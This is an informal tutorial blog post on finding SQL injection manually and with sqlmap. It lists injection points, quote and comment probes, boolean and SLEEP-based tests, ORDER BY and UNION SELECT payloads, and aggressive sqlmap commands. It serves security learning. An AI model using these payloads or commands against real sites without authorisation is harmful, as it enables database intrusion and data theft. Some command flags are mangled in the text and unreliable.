SQL INJECTION is a web application vulnerability in which we giving such type of input so that it can communicate with the web site database and give output according to our inserted query.
HOW TO FIND SQL INJECTION BY MANUALLY
We have 4 steps to find the SQL Injection.
1. Find the INJECTION POINT.
2. IDENTIFY VULNERABILITY.
3. BALANCE THE QUERY.
4. INJECT SQLI QUERIES or PAYLOAD.
LET’S UNDERSTAND THESE 4 STEPS ONE BY ONE
STEP 1. FIND THE INJECTION POINT
Find the type of input that is communicated with the database of the website and give output according to our query.
For Example
1. GET BASED
https://any.com/?id=1or something after “=”
In the background, it may be like “select id =(1)
2. POST BASED
Any HTML page that may execute SQL query like:-
a. Signup Page/Login page
b. Forget Password page
c. Search Page
3. HEADER BASED
Some HEADERS
a. Referrer
b. User-Agent
c. Location
d. Host
4. Cookie Based
Find the cookie parameter like:-
Cookie: username = XYZ
STEP 2. IDENTIFY VULNERABILITY
FIRST YOU GIVE “\” IN THE SQLI POINT THEN FIND OUT WHICH TYPE OF ERROR DATABASE GIVE TO YOU AND ALSO TRY |’|”|’)|”)| FOR FIND THE ERROR
1. Error based
In this database give an error to us with some useful information about the database structure
2. Union Based
The union keyword is used to retrieve information from the database of another table. It executes in such a way that it can add the result of their query and our query result.
like:- $ “SELECT x, y FROM tableA UNION SELECT h, k FROM tableB”
3. Blind Boolean Based
On Login page :
User_Id : XYZ*
Try these after ‘z’
a. And 1=1 (True)
b. OR 1=1 (True)
c. And 1=2 (False)
d. OR 1=2 (False)
4. Blind time based
a. And SLEEP(10) if sleep then Vulnerable
b. OR SLEEP(10) if sleep then vulnerable
STEP 3. BALANCE THE QUERY.
First, you have to close their website database query then enter your injection then comment the other part of the query like:-
User_Name :- “XYZ” ___
a. — +
b. — space
c. #
d. some time only space
Once the query is Balance then you can try your payloads
STEP 4. INJECT SQLI QUERIES or PAYLOAD.
1.Find Out the Number of columns by using:-
a. order by 1
b. order by 2
c. order by 3
like that try one by one
2. At the right number of columns you have received no error and here boom!!!! let’s assume you got no error on “order by 3”
3. Now you find the reflected columns with the select query like:-
. union all Select 1,2,3 , ….,n [ when you find 3 columns]
NOW TRY SQL INJECTION WITH AUTOMATED TOOL SQLMAP
INSTALL SQLMAP FROM GIT HUB
$ https://github.com/sqlmapproject/sqlmap
1. GET BASED
Command for GET Based SQLI
- Basic Command
$ python3 sqlmap.py -u “URL” — batch –banner
Read the help of sqlmap
$ python3 sqlmap.py -hh
2. Advance Command
$ python3 sqlmap.py -u “URL” — batch — banner — level=5 — risk=3
2. Automation of SQLI POST Based | Header Based | Cookie Based
- First, you capture the request in BURPSUIT then add “*” where you want to attack.
- Copy the request in the .txt file in the SQLMAP directory.
- Basic Command
$ python3 sqlmap.py -r file_name.txt — batch — banner
4. Advance Command
$ python3 sqlmap.py -r file_name.txt — batch — banner — level=5
— risk=3
Follow me on:-
Twitter:- https://twitter.com/MrVoidCG
Instagram:- https://www.instagram.com/chaman_gola/